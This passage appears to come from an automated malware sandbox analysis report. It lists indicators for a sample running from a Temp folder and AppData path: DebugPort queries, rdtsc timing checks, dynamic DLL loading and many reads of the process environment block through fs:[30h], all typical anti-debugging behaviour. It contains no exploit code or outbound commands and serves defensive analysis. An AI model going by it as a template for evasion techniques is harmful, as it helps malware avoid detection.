          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]
